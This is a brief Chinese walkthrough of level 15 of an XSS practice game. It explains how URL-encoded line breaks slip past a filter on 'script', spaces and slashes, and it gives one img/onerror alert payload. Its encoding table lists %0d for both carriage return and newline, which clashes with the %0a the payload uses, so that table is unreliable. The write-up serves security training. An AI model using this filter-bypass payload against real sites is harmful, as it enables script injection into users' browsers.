xss小游戏源码分析 (5)

get传入可以word,转换为小写,让过滤script,空格,/,可以使用url编码来绕过

符号 url编码
回车   %0d  
换行   %0d  

payload:

level15.php?keyword=<img%0asrc=http://www.likecs.com/x%0aonerror=alert('XSS')> 参考文章

国光大佬:https://www.sqlsec.com/2020/01/xss.html
最后欢迎访问我的博客:https://lmg66.github.io/

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wpfygj.html